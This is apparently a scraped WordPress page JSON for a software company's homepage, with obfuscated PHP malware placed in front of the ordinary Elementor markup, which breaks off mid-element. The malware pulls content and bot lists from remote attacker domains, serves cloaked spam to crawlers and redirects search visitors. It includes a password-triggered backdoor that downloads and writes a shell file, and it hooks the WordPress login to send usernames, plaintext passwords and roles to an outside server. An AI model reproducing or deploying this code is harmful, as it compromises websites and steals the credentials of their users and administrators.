if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?>{"id":566,"date":"2019-10-25T09:50:44","date_gmt":"2019-10-25T09:50:44","guid":{"rendered":"http:\/\/demo.athemes.com\/sydney-redesign\/?page_id=13"},"modified":"2020-07-22T21:00:56","modified_gmt":"2020-07-22T18:00:56","slug":"home-2","status":"publish","type":"page","link":"https:\/\/techxers.co.ke\/","title":{"rendered":"Home"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"566\" class=\"elementor elementor-566\" data-elementor-settings=\"[]\">\n\t\t\t\t\t\t<div class=\"elementor-inner\">\n\t\t\t\t\t\t\t<div class=\"elementor-section-wrap\">\n\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0232e55 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0232e55\" data-element_type=\"section\" data-settings=\"{"background_background":"classic"}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2253cb9\" data-id=\"2253cb9\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d29d24f elementor-widget elementor-widget-heading\" data-id=\"d29d24f\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Our Services<\/h1>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7479f1c elementor-widget elementor-widget-heading\" data-id=\"7479f1c\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<span class=\"elementor-heading-title elementor-size-medium\">We Promise to create a stunning user-friendly Website or Mobile app that brings your business to life and makes your brand stand out from your competitors.We will understand your vision and develop something that is unique to your business<\/span>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-5e671bc elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5e671bc\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-560a5ae\" data-id=\"560a5ae\" data-element_type=\"column\" data-settings=\"{"background_background":"classic"}\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0640204 elementor-view-stacked elementor-shape-circle elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-icon-box\" data-id=\"0640204\" data-element_type=\"widget\" data-widget_type=\"icon-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-icon-box-wrapper\">\n\t\t\t\t\t\t<div class=\"elementor-icon-box-icon\">\n\t\t\t\t<span class=\"elementor-icon elementor-animation-\" >\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-mobile\"><\/i>\t\t\t\t<\/span>\n\t\t\t<\/div>\n\t\t\t\t\t\t<div class=\"elementor-icon-box-content\">\n\t\t\t\t<h2 class=\"elementor-icon-box-title\">\n\t\t\t\t\t<span >\n\t\t\t\t\t\tApp\/Web Development\t\t\t\t\t<\/span>\n\t\t\t\t<\/h2>\n\t\t\t\t\t\t\t\t\t<p class=\"elementor-icon-box-description\">\n\t\t\t\t\t\tPartner with our experienced team and develop robust software application, whether you\u2019re a start-up or an established business looking to outshine with innovative ideas!\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-cf4b21c\" data-id=\"cf4b21c\" data-element_type=\"column\" data-settings=\"{"background_background":"classic"}\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1d85000 elementor-view-stacked elementor-shape-circle elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-icon-box\" data-id=\"1d85000\" data-element_type=\"widget\" data-widget_type=\"icon-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-icon-box-wrapper\">\n\t\t\t\t\t\t<div class=\"elementor-icon-box-icon\">\n\t\t\t\t<span class=\"elementor-icon elementor-animation-\" >\n\t\t\t\t<i aria-hidden=\"true\" class=\"fab fa-adobe\"><\/i>\t\t\t\t<\/span>\n\t\t\t<\/div>\n\t\t\t\t\t\t<div class=\"elementor-icon-box-content\">\n\t\t\t\t<h2 class=\"elementor-icon-box-title\">\n\t\t\t\t\t<span >\n\t\t\t\t\t\tUI-UX Design\t\t\t\t\t<\/span>\n\t\t\t\t<\/h2>\n\t\t\t\t\t\t\t\t\t<p class=\"elementor-icon-box-description\">\n\t\t\t\t\t\tWe have a proven expertise in creating positive user experience while delivering products and solutions. Our strong digital team focuses on delivering creative solutions aligned with human-centric research and design.\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-e84c0e6\" data-id=\"e84c0e6\" data-element_type=\"column\" data-settings=\"{"background_background":"classic"}\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ca26008 elementor-view-stacked elementor-shape-circle elementor-position-top elementor-vertical-align-top elementor-widget elementor-widget-icon-box\" data-id=\"ca26008\" data-element_type=\"widget\" data-widget_type=\"icon-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-icon-box-wrapper\">\n\t\t\t\t\t\t<div class=\"elementor-icon-box-icon\">\n\t\t\t\t<span class=\"elementor-icon elementor-animation-\" >\n\t\t\t\t<i aria-hidden=\"true\" class=\"fab fa-connectdevelop\"><\/i>\t\t\t\t<\/span>\n\t\t\t<\/div>\n\t\t\t\t\t\t<div class=\"elementor-icon-box-content\">\n\t\t\t\t<h2 class=\"elementor-icon-box-title\">\n\t\t\t\t\t<span >\n\t\t\t\t\t\tHire Developers\t\t\t\t\t<\/span>\n\t\t\t\t<\/h2>\n\t\t\t\t\t\t\t\t\t<p class=\"elementor-icon-box-description\">\n\t\t\t\t\t\tWe connect clients with vetted software developers from our within professional network.\nWe add value to our business relationships with focus on quality and accountability from all customers and partners.\n\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<div class=\"elementor-element elementor-element-1745358 elementor-align-center elementor-widget elementor-widget-button\" data-id=\"1745358\" data-element_type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t<a href=\"\/services-2\" class=\"elementor-button-link elementor-button elementor-size-xs\" role=\"button\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t<span class=\"elementor-button-text\">View All Services<\/span>\n\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-72a3969 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"72a3969\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-7a9b9ce\" data-id=\"7a9b9ce\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-df38c5a elementor-widget elementor-widget-heading\" data-id=\"df38c5a\" 